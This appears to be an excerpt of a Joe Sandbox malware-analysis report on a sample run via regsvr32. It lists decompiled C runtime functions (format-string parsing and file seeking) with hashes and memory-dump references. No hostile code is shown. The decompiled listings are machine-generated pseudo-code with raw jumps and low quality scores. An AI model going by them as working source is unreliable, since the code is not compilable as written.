                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-192189897
                                    • Opcode ID: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                    • Instruction ID: aadf3acbccf6ff41cc1b37cb3268d324d4900ab85ae7fa80aabce8c8f65e01df
                                    • Opcode Fuzzy Hash: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                    • Instruction Fuzzy Hash: 13414C72A0D6C28AE3B0DB24E8547BEB7E4E385345F600126D6D987AA9DB7DD541CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DC6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 28%
                                    			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t204 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t204);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t205 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t205);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t184 + _t205 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                    0x7fef9d3dc6b
                                    0x7fef9d3dc77
                                    0x7fef9d3dc7f
                                    0x7fef9d3dc87
                                    0x7fef9d3dc8b
                                    0x7fef9d3dc93
                                    0x7fef9d3dc9b
                                    0x7fef9d3dcb0
                                    0x7fef9d3dcbf
                                    0x7fef9d3dcc9
                                    0x7fef9d3dcd3
                                    0x7fef9d3dcdd
                                    0x7fef9d3dce7
                                    0x7fef9d3dce9
                                    0x7fef9d3dcf2
                                    0x7fef9d3dcf6
                                    0x7fef9d3dcff
                                    0x7fef9d3dd03
                                    0x7fef9d3dd0c
                                    0x7fef9d3dd10
                                    0x7fef9d3dd16
                                    0x7fef9d3dd1e
                                    0x7fef9d3dd27
                                    0x7fef9d3dd3b
                                    0x7fef9d3dd3d
                                    0x7fef9d3dd4a
                                    0x7fef9d3dd53
                                    0x7fef9d3dd5c
                                    0x7fef9d3dd66
                                    0x7fef9d3dd6a
                                    0x7fef9d3dd7f
                                    0x7fef9d3dd88
                                    0x7fef9d3dda0
                                    0x7fef9d3dda2
                                    0x7fef9d3ddaf
                                    0x7fef9d3ddb8
                                    0x7fef9d3ddba
                                    0x7fef9d3ddc2
                                    0x7fef9d3ddd7
                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-734865713
                                    • Opcode ID: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                    • Instruction ID: e7137eedf57618a3e563147601a49a8da4cfcefd457897bce2b88a2abc432a47
                                    • Opcode Fuzzy Hash: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                    • Instruction Fuzzy Hash: 7E411CB2A0C6C18AE7B0CB64E8447BEB7E0F384349F600125E6D987AA9D77DD445CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DC41 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 28%
                                    			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
				void* _t190;
				char* _t210;
				char* _t211;

				_a76 = 1;
				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t210 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t210);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t190 + _t210 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t211 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t211);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t190 + _t211 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                    0x7fef9d3dc41
                                    0x7fef9d3dc61
                                    0x7fef9d3dc6b
                                    0x7fef9d3dc77
                                    0x7fef9d3dc7f
                                    0x7fef9d3dc87
                                    0x7fef9d3dc8b
                                    0x7fef9d3dc93
                                    0x7fef9d3dc9b
                                    0x7fef9d3dcb0
                                    0x7fef9d3dcbf
                                    0x7fef9d3dcc9
                                    0x7fef9d3dcd3
                                    0x7fef9d3dcdd
                                    0x7fef9d3dce7
                                    0x7fef9d3dce9
                                    0x7fef9d3dcf2
                                    0x7fef9d3dcf6
                                    0x7fef9d3dcff
                                    0x7fef9d3dd03
                                    0x7fef9d3dd0c
                                    0x7fef9d3dd10
                                    0x7fef9d3dd16
                                    0x7fef9d3dd1e
                                    0x7fef9d3dd27
                                    0x7fef9d3dd3b
                                    0x7fef9d3dd3d
                                    0x7fef9d3dd4a
                                    0x7fef9d3dd53
                                    0x7fef9d3dd5c
                                    0x7fef9d3dd66
                                    0x7fef9d3dd6a
                                    0x7fef9d3dd7f
                                    0x7fef9d3dd88
                                    0x7fef9d3dda0
                                    0x7fef9d3dda2
                                    0x7fef9d3ddaf
                                    0x7fef9d3ddb8
                                    0x7fef9d3ddba
                                    0x7fef9d3ddc2
                                    0x7fef9d3ddd7
                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-734865713
                                    • Opcode ID: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                    • Instruction ID: fc8006ff6f8d7d76551d502993a9577a4ed4fa9ca6386b0b138cfffaa104f198
                                    • Opcode Fuzzy Hash: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                    • Instruction Fuzzy Hash: 48412BB2A0C6C286E7F09B64E8407BE72E4F38434AF600126D6C9875A9DB3ED444CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BDDA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t134 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t134);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t114 + _t134 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}





                                    0x7fef9d3bdda
                                    0x7fef9d3bdf2
                                    0x7fef9d3bdf4
                                    0x7fef9d3be01
                                    0x7fef9d3be0a
                                    0x7fef9d3be0c
                                    0x7fef9d3be14
                                    0x7fef9d3be29
                                    0x7fef9d3be3a
                                    0x7fef9d3be49
                                    0x7fef9d3be53
                                    0x7fef9d3be61
                                    0x7fef9d3be6b
                                    0x7fef9d3be71
                                    0x7fef9d3be84
                                    0x7fef9d3be91
                                    0x7fef9d3be9d
                                    0x7fef9d3bea5
                                    0x7fef9d3beae
                                    0x7fef9d3beb2
                                    0x7fef9d3bebb
                                    0x7fef9d3bed1
                                    0x7fef9d3bee2
                                    0x7fef9d3bef0
                                    0x7fef9d3befc
                                    0x7fef9d3bf04
                                    0x7fef9d3bf17
                                    0x7fef9d3bf28
                                    0x7fef9d3bf36
                                    0x7fef9d3bf42
                                    0x7fef9d3bf4a
                                    0x7fef9d3bf5a
                                    0x7fef9d3bf6a
                                    0x7fef9d3bf7a
                                    0x7fef9d3bf8a
                                    0x7fef9d3bf9a
                                    0x7fef9d3bfaa
                                    0x7fef9d3bfac
                                    0x7fef9d3bfae
                                    0x7fef9d3bfb9
                                    0x7fef9d3bfbe
                                    0x7fef9d3bfc7
                                    0x7fef9d3bfcb
                                    0x7fef9d3bfd1
                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-192189897
                                    • Opcode ID: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                    • Instruction ID: 4b3f24e3fb7174c937380b25a7ddf4328f53ddd6ef2afac6cc97801a46cd3647
                                    • Opcode Fuzzy Hash: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                    • Instruction Fuzzy Hash: 41416E72A0DAC28AE3F0DB24E8547BEB7E4E385345F600126D6DD869A9DB7ED141CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DD88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t134 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t134);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t114 + _t134 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}





                                    0x7fef9d3dd88
                                    0x7fef9d3dda0
                                    0x7fef9d3dda2
                                    0x7fef9d3ddaf
                                    0x7fef9d3ddb8
                                    0x7fef9d3ddba
                                    0x7fef9d3ddc2
                                    0x7fef9d3ddd7
                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
                                    0x7fef9d3df39
                                    0x7fef9d3df49
                                    0x7fef9d3df59
                                    0x7fef9d3df5b
                                    0x7fef9d3df5d
                                    0x7fef9d3df68
                                    0x7fef9d3df6d
                                    0x7fef9d3df76
                                    0x7fef9d3df7a
                                    0x7fef9d3df80
                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-734865713
                                    • Opcode ID: 18be2ec324f4e6ddaf4da83870b7f9445444224664337f66457babe689a72d53
                                    • Instruction ID: 7f650dd300c45f52e976b570372fea59531d88f616deac0b68cc0cf4a1a25f4d
                                    • Opcode Fuzzy Hash: 18be2ec324f4e6ddaf4da83870b7f9445444224664337f66457babe689a72d53
                                    • Instruction Fuzzy Hash: 9D4128A2A0C6C286E7F09B64E8447BE72E4F38434AF600126D6C9876A9DB3ED444CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D39520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                    • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                    • API String ID: 275287319-2412454244
                                    • Opcode ID: c7efb4c2b63aa0ea1a393bbb45a77ac8f6d4c0e98eaf8d85a5d097220697af2b
                                    • Instruction ID: 4cc925a7ddd92a70968dc62c242263200834f6053f28a3bc4a48022cf8d44a9e
                                    • Opcode Fuzzy Hash: c7efb4c2b63aa0ea1a393bbb45a77ac8f6d4c0e98eaf8d85a5d097220697af2b
                                    • Instruction Fuzzy Hash: FA318372A18B85C6D790CB28E88066E73A1F7857A5F604325E6FE47AF9CB3DD440CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D26210 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
